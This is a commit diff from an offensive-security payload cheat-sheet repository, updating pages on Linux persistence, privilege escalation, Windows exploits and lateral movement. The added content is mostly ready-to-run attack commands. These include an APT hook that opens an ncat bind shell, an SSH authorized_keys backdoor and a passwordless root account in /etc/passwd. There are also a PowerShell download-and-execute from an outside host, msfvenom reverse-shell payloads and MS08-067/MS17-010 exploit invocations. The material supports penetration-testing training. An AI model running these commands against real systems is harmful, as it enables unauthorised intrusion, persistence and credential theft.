mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Linux PrivEsc + SSH persistency
This commit is contained in:
parent
f5a8a6b62f
commit
adcea1a913
@ -4,9 +4,18 @@
|
|||||||
|
|
||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
|
* [Tools](#tools)
|
||||||
* [Basic exploitation](#basic-exploitation)
|
* [Basic exploitation](#basic-exploitation)
|
||||||
* [Path Traversal](#path-traversal)
|
* [Path Traversal](#path-traversal)
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
|
- [dotdotpwn - https://github.com/wireghoul/dotdotpwn](https://github.com/wireghoul/dotdotpwn)
|
||||||
|
```powershell
|
||||||
|
git clone https://github.com/wireghoul/dotdotpwn
|
||||||
|
perl dotdotpwn.pl -h 10.10.10.10 -m ftp -t 300 -f /etc/shadow -s -q -b
|
||||||
|
```
|
||||||
|
|
||||||
## Basic exploitation
|
## Basic exploitation
|
||||||
|
|
||||||
We can use the `..` characters to access the parent directory, the following strings are several encoding that can help you bypass a poorly implemented filter.
|
We can use the `..` characters to access the parent directory, the following strings are several encoding that can help you bypass a poorly implemented filter.
|
||||||
|
@ -79,6 +79,14 @@ Next time "apt-get update" is done, your CMD will be executed!
|
|||||||
echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor
|
echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Backdooring the SSH
|
||||||
|
|
||||||
|
Add an ssh key into the `~/.ssh` folder.
|
||||||
|
|
||||||
|
1. `ssh-keygen`
|
||||||
|
2. write the content of `~/.ssh/id_rsa.pub` into `~/.ssh/authorized_keys`
|
||||||
|
3. set the right permission, 700 for ~/.ssh and 600 for authorized_keys
|
||||||
|
|
||||||
## Tips
|
## Tips
|
||||||
|
|
||||||
Hide the payload with ANSI chars, the following chars will clear the terminal when using cat to display the content of your payload.
|
Hide the payload with ANSI chars, the following chars will clear the terminal when using cat to display the content of your payload.
|
||||||
|
@ -392,6 +392,7 @@ echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
|
|||||||
su - dummy
|
su - dummy
|
||||||
```
|
```
|
||||||
|
|
||||||
|
NOTE: In BSD platforms `/etc/passwd` is located at `/etc/pwd.db` and `/etc/master.passwd`, also the `/etc/shadow` is renamed to `/etc/spwd.db`.
|
||||||
|
|
||||||
## NFS Root Squashing
|
## NFS Root Squashing
|
||||||
|
|
||||||
|
@ -282,7 +282,7 @@ $ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw
|
|||||||
|
|
||||||
Access shortcuts, su, nano and autocomplete in a partially tty shell
|
Access shortcuts, su, nano and autocomplete in a partially tty shell
|
||||||
|
|
||||||
/!\ OhMyZSH might break this trick, a simple `sh` is recommended
|
:warning: OhMyZSH might break this trick, a simple `sh` is recommended
|
||||||
|
|
||||||
> The main problem here is that zsh doesn't handle the stty command the same way bash or sh does. [...] stty raw -echo; fg[...] If you try to execute this as two separated commands, as soon as the prompt appear for you to execute the fg command, your -echo command already lost its effect
|
> The main problem here is that zsh doesn't handle the stty command the same way bash or sh does. [...] stty raw -echo; fg[...] If you try to execute this as two separated commands, as soon as the prompt appear for you to execute the fg command, your -echo command already lost its effect
|
||||||
|
|
||||||
|
@ -17,6 +17,7 @@
|
|||||||
* [EoP - Runas](#eop---runas)
|
* [EoP - Runas](#eop---runas)
|
||||||
* [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposures)
|
* [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposures)
|
||||||
* [Token Impersonation (RottenPotato)](#token-impersonation-rottenpotato)
|
* [Token Impersonation (RottenPotato)](#token-impersonation-rottenpotato)
|
||||||
|
* [MS08-067 (NetAPI)](#ms08-067-netapi)
|
||||||
* [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64)
|
* [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64)
|
||||||
* [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue)
|
* [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue)
|
||||||
|
|
||||||
@ -24,6 +25,9 @@
|
|||||||
|
|
||||||
- [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson)
|
- [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson)
|
||||||
- [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock)
|
- [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock)
|
||||||
|
```powershell
|
||||||
|
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File Sherlock.ps1
|
||||||
|
```
|
||||||
- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
|
- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
|
||||||
- [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester)
|
- [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester)
|
||||||
```powershell
|
```powershell
|
||||||
@ -623,6 +627,37 @@ Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
|
|||||||
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
|
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### MS08-067 (NetAPI)
|
||||||
|
|
||||||
|
Check the vulnerability with the following nmap script.
|
||||||
|
|
||||||
|
```c
|
||||||
|
nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms08-067 <ip_netblock>
|
||||||
|
```
|
||||||
|
|
||||||
|
Metasploit modules to exploit `MS08-067 NetAPI`.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
exploit/windows/smb/ms08_067_netapi
|
||||||
|
```
|
||||||
|
|
||||||
|
If you can't use Metasploit and only want a reverse shell.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
|
||||||
|
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
|
||||||
|
|
||||||
|
Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
|
||||||
|
Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
|
||||||
|
Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
|
||||||
|
Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
|
||||||
|
Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
|
||||||
|
Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
|
||||||
|
Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)
|
||||||
|
python ms08-067.py 10.0.0.1 6 445
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
|
### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
|
||||||
|
|
||||||
Check if the patch is installed : `wmic qfe list | find "3139914"`
|
Check if the patch is installed : `wmic qfe list | find "3139914"`
|
||||||
@ -639,12 +674,31 @@ Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
|
|||||||
|
|
||||||
### MS17-010 (Eternal Blue)
|
### MS17-010 (Eternal Blue)
|
||||||
|
|
||||||
|
Check the vulnerability with the following nmap script.
|
||||||
|
|
||||||
```c
|
```c
|
||||||
nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010 <ip_netblock>
|
nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010 <ip_netblock>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Metasploit modules to exploit `EternalRomance/EternalSynergy/EternalChampion`.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
auxiliary/admin/smb/ms17_010_command MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
|
||||||
|
auxiliary/scanner/smb/smb_ms17_010 MS17-010 SMB RCE Detection
|
||||||
|
exploit/windows/smb/ms17_010_eternalblue MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
|
||||||
|
exploit/windows/smb/ms17_010_eternalblue_win8 MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
|
||||||
|
exploit/windows/smb/ms17_010_psexec MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
|
||||||
|
```
|
||||||
|
|
||||||
|
If you can't use Metasploit and only want a reverse shell.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
git clone https://github.com/helviojunior/MS17-010
|
||||||
|
|
||||||
|
# generate a simple reverse shell to use
|
||||||
|
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o revshell.exe
|
||||||
|
python2 send_and_execute.py 10.0.0.1 revshell.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
@ -40,9 +40,9 @@ Password: pw123
|
|||||||
|
|
||||||
```c
|
```c
|
||||||
use auxiliary/scanner/smb/smb_login
|
use auxiliary/scanner/smb/smb_login
|
||||||
set SMBDomain CSCOU
|
set SMBDomain DOMAIN
|
||||||
set SMBUser jarrieta
|
set SMBUser username
|
||||||
set SMBPass nastyCutt3r
|
set SMBPass password
|
||||||
services -p 445 -R
|
services -p 445 -R
|
||||||
run
|
run
|
||||||
creds
|
creds
|
||||||
@ -55,8 +55,8 @@ Note: the password can be replaced by a hash to execute a `pass the hash` attack
|
|||||||
```c
|
```c
|
||||||
use exploit/windows/smb/psexec
|
use exploit/windows/smb/psexec
|
||||||
set RHOST 10.2.0.3
|
set RHOST 10.2.0.3
|
||||||
set SMBUser jarrieta
|
set SMBUser username
|
||||||
set SMBPass nastyCutt3r
|
set SMBPass password
|
||||||
set PAYLOAD windows/meterpreter/bind_tcp
|
set PAYLOAD windows/meterpreter/bind_tcp
|
||||||
run
|
run
|
||||||
shell
|
shell
|
||||||
@ -66,8 +66,8 @@ shell
|
|||||||
|
|
||||||
```python
|
```python
|
||||||
git clone https://github.com/byt3bl33d3r/CrackMapExec.github
|
git clone https://github.com/byt3bl33d3r/CrackMapExec.github
|
||||||
python crackmapexec.py 10.9.122.0/25 -d CSCOU -u jarrieta -p nastyCutt3r
|
python crackmapexec.py 10.9.122.0/25 -d DOMAIN -u username -p password
|
||||||
python crackmapexec.py 10.9.122.5 -d CSCOU -u jarrieta -p nastyCutt3r -x whoami
|
python crackmapexec.py 10.10.10.10 -d DOMAIN -u username -p password -x whoami
|
||||||
```
|
```
|
||||||
|
|
||||||
## Crackmapexec (Pass The Hash)
|
## Crackmapexec (Pass The Hash)
|
||||||
@ -79,23 +79,27 @@ cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:55
|
|||||||
## Winexe (Integrated to Kali)
|
## Winexe (Integrated to Kali)
|
||||||
|
|
||||||
```python
|
```python
|
||||||
winexe -U CSCOU/jarrieta%nastyCutt3r //10.9.122.5 cmd.exe
|
winexe -U DOMAIN/username%password //10.10.10.10 cmd.exe
|
||||||
```
|
```
|
||||||
|
|
||||||
## Psexec.py / Smbexec.py / Wmiexec.py (Impacket)
|
## Psexec.py / Smbexec.py / Wmiexec.py (Impacket)
|
||||||
|
|
||||||
```python
|
```python
|
||||||
git clone https://github.com/CoreSecurity/impacket.git
|
git clone https://github.com/CoreSecurity/impacket.git
|
||||||
python psexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
|
python psexec.py DOMAIN/username:password@10.10.10.10
|
||||||
python smbexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
|
python smbexec.py DOMAIN/username:password@10.10.10.10
|
||||||
python wmiexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
|
python wmiexec.py DOMAIN/username:password@10.10.10.10
|
||||||
|
|
||||||
|
# psexec.exe -s cmd
|
||||||
|
# switch admin user to NT Authority/System
|
||||||
```
|
```
|
||||||
|
|
||||||
## RDP Remote Desktop Protocol (Impacket)
|
## RDP Remote Desktop Protocol (Impacket)
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
|
python rdpcheck.py DOMAIN/username:password@10.10.10.10
|
||||||
rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5 -g 70 -r disk:share=/home/user/myshare
|
rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare
|
||||||
|
rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10
|
||||||
# -g : the screen will take up 70% of your actual screen size
|
# -g : the screen will take up 70% of your actual screen size
|
||||||
# -r disk:share : sharing a local folder during a remote desktop session
|
# -r disk:share : sharing a local folder during a remote desktop session
|
||||||
```
|
```
|
||||||
@ -137,21 +141,21 @@ xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1
|
|||||||
## Netuse (Windows)
|
## Netuse (Windows)
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
net use \\ordws01.cscou.lab /user:CSCOU\jarrieta nastyCutt3r
|
net use \\ordws01.cscou.lab /user:DOMAIN\username password
|
||||||
C$
|
C$
|
||||||
```
|
```
|
||||||
|
|
||||||
## Runas (Windows - Kerberos auth)
|
## Runas (Windows - Kerberos auth)
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
runas /netonly /user:CSCOU\jarrieta "cmd.exe"
|
runas /netonly /user:DOMAIN\username "cmd.exe"
|
||||||
```
|
```
|
||||||
|
|
||||||
## PsExec (Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) )
|
## PsExec (Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) )
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe
|
PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe
|
||||||
PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe -s # get System shell
|
PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s # get System shell
|
||||||
```
|
```
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
@ -4,7 +4,7 @@ A list of useful payloads and bypasses for Web Application Security.
|
|||||||
Feel free to improve with your payloads and techniques !
|
Feel free to improve with your payloads and techniques !
|
||||||
I :heart: pull requests :)
|
I :heart: pull requests :)
|
||||||
|
|
||||||
You can also contribute with a beer IRL or with `buymeacoffee.com`
|
You can also contribute with a :beers: IRL or with `buymeacoffee.com`
|
||||||
|
|
||||||
[![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky)
|
[![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky)
|
||||||
|
|
||||||
@ -22,7 +22,7 @@ You might also like the `Methodology and Resources` folder :
|
|||||||
- [Linux - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Persistence.md)
|
- [Linux - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Persistence.md)
|
||||||
- [Linux - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md)
|
- [Linux - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md)
|
||||||
- [Metasploit - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet.md)
|
- [Metasploit - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet.md)
|
||||||
- [Methodology_and_enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Methodology_and_enumeration.md)
|
- [Methodology and enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Methodology%20and%20enumeration.md)
|
||||||
- [Network Pivoting Techniques.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md)
|
- [Network Pivoting Techniques.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md)
|
||||||
- [Network Discovery.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Discovery.md)
|
- [Network Discovery.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Discovery.md)
|
||||||
- [Reverse Shell Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
|
- [Reverse Shell Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
|
||||||
|
Loading…
Reference in New Issue
Block a user